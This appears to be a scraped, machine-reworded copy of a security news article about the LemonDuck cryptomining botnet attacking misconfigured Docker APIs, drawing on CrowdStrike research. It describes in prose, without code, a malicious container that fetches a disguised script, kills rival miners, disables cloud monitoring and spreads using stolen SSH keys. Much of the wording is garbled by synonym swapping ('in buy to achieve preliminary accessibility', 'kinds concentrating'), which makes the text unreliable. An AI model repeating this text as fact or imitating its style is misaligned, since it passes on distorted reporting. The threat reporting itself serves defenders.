A infamous cryptocurrency mining botnet has begun targeting misconfigured Docker APIs, according to CrowdStrike.
LemonDuck has been noticed exploiting ProxyLogon vulnerabilities in Microsoft Exchange Server and applying EternalBlue and other exploits to mine cryptocurrency, escalate privileges and shift laterally inside compromised networks.
Now its consideration has turned to one of the world’s most popular containerization platforms.
The botnet is concentrating on uncovered Docker APIs in buy to achieve preliminary accessibility, CrowdStrike described.
“It runs a destructive container on an exposed Docker API by applying a custom Docker Entrypoint to download a ‘core.png’ picture file that is disguised as Bash script,” it said in a site post yesterday.
Right before the payload – an “a.asp” file – is downloaded and mining can start, it performs various steps, including killing the processes, IOC file paths and C&C connections of competing crypto-mining teams.
The a.asp file also has the capability to change off Alibaba’s cloud checking provider in buy to fly beneath the radar of network defenders.
LemonDuck tries to transfer laterally by exploring for SSH keys on a filesystem, employing them to log into additional servers and operate its destructive scripts.
The scientists also located many strategies jogging from a lot of of the C&C servers related with LemonDuck, including kinds concentrating on Windows and Linux devices.
“Due to the cryptocurrency increase in recent decades, mixed with cloud and container adoption in enterprises, cryptomining is tested to be a monetarily interesting option for attackers,” CrowdStrike concluded.
“Since cloud and container ecosystems intensely use Linux, it drew the awareness of the operators of botnets like LemonDuck, which began targeting Docker for cryptomining on the Linux system.”
The campaign highlights the want for directors to assure their container environments are appropriately configured in accordance to business finest tactics, and ideally with cloud workload security and detection and reaction resources mounted.
Some parts of this article are sourced from:
www.infosecurity-journal.com